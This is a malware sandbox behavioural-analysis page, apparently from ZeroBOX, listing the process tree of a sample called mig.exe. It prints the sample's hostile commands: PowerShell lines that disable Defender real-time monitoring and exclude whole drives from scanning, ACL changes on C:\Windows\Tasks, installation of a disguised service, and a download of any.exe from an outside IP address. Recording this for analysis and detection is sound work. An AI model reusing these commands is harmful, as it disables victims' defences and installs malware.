| ZeroBOX

mig.exe "C:\Users\test22\AppData\Local\Temp\mig.exe"
2668
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
  2768
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
  2908
- 1.exe "C:\programdata\1.exe" /D
  3032
- cmd.exe cmd /c ""C:\programdata\ru.bat" "
  2052
  - cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
    1484
    - chcp.com chcp 65001
      2256
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
      2376
    - findstr.exe findstr /i "Platform"
      2488
    - powershell.exe powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
      2628
    - find.exe find /I /N "Superfetch.exe"
      1080
    - tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
      2788
    - takeown.exe takeown /f c:\windows\tasks
      2412
    - timeout.exe TIMEOUT /T 3 /NOBREAK
      3012
    - icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
      2116
    - icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
      2672
    - icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
      1404
    - icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
      2272
    - icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
      2504
    - icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
      2616
    - icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
      2744
    - timeout.exe TIMEOUT /T 3 /NOBREAK
      2832
    - migrate.exe c:\programdata\migrate.exe -p4432
      2784
      - cmd.exe cmd /c ""C:\windows\tasks\run.bat" "
        940
        
        timeout.exe TIMEOUT /T 1 /NOBREAK
        2720
        
        Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
        2064
        
        timeout.exe TIMEOUT /T 1 /NOBREAK
        1576
        
        Wmiic.exe "C:\windows\tasks\wmiic" start WMService
        2820
        
        timeout.exe TIMEOUT /T 2 /NOBREAK
        2944
        
        net.exe net start WMService
        2704
        
        net1.exe C:\Windows\system32\net1 start WMService
        2852
    - timeout.exe TIMEOUT /T 3 /NOBREAK
      2068
    - powershell.exe powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"
      2316
    - timeout.exe TIMEOUT /T 3 /NOBREAK
      2996
    - timeout.exe TIMEOUT /T 10 /NOBREAK
      1400
    - tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
      452
    - find.exe find /I /N "Superfetch.exe"
      1632
- dc.exe "C:\programdata\dc.exe"
  800
  - dc.exe "C:\programdata\dc.exe"
    2988

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents